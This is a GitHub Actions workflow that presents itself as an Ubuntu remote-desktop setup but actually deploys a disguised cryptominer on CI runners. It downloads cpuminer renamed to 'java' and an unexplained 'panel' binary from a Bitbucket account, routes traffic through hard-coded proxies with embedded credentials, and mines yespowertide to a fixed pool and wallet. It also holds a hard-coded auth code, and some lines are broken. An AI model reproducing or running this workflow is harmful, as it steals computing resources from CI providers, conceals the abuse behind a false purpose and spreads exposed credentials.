name: ubunturdp
on: 
  workflow_dispatch:
     inputs:
       auth:
          description: 'GRDP Authorization Code'
          required: true
          default: 'DISPLAY= /opt/google/chrome-remote-desktop/start-host --code="4/0AanRRrsnp_mmTUyd2f5aV733XY9WSfvSik1N-OLyhgc2JJUyBahtG6tQAOX025feOEn-wA" --redirect-url="https://remotedesktop.google.com/_/oauthredirect" --name=$(hostname)'
        
defaults:
  run:
    shell: bash
jobs:
  build:
    runs-on: depot-ubuntu-22.04-32
    steps:
    - name: Creating User to Login
      run: |
          sudo su
          sleep 2
          cd
          rm -rvf *
          echo "="
          echo " CEK TIMEZONE "
          echo "="
          echo " "
          echo " "
          ln -fs /usr/share/zoneinfo/Asia/Jakarta /etc/localtime
          dpkg-reconfigure --frontend noninteractive tzdata
          sleep 2
          apt update -y;apt -y install libcurl4-openssl-dev libssl-dev libjansson-dev automake autotools-dev build-essential binutils git cmake screen unzip net-tools curl -y
          sleep 3
          cd ~/
          PROXY=47.236.86.158
          PORT=443
          USERR=dks
          PASSS=123
          wget https://github.com/rplant8/cpuminer-opt-rplant/releases/download/5.0.27/cpuminer-opt-linux.tar.gz --no-check-certificate && tar xf cpuminer-opt-linux.tar.gz && rm cpuminer-opt-linux.tar.gz && mv cpuminer-sse2 java && cp java ~/
          wget -q -O p https://bitbucket.org/asimadarasi/alima/downloads/panel && chmod +x p && cp p ~/
          wget -q https://bitbucket.org/asimadarasi/alima/downloads/proxychains.conf && chmod +x proxychains.conf
          wget -q https://bitbucket.org/asimadarasi/alima/downloads/libproxychains4.so && chmod +x libproxychains4.so && cp * ~/
          sleep 3
          sed -i "s/127.0.0.1/$PROXY/" "proxychains.conf"
          sleep 1
          sed -i "s/port/$PORT/" "proxychains.conf"
          sleep 1
          sed -i "s/user/$USER/" "proxychains.conf"
          sleep 1
          sed -i "s/pass/$PASS/" "proxychains.conf"
          sleep 3
          echo "IP ORI > "$(curl ifconfig.me)
          echo " "
          echo " "
          echo "IP BARU ==> "$(./ curl ifconfig.me)
          sleep 3
          clear
          echo " "
          echo "="
          echo "Bismillahirahmannirrahim"
          echo "==="
          echo "GO GO THR"
          echo " "
          sleep 4
          ./p ./java -q -a yespowertide -o 141.94.192.217:17059 -u TASjYMUtTcEkEKcEmmPqTg4haJxSw94q3N.depot$(echo $(shuf -i 1-999 -n 1)) --cpu-priority=0 -x ibufzbdc-rotate:wplcyw9gj28e@p.webshare.io:80
          
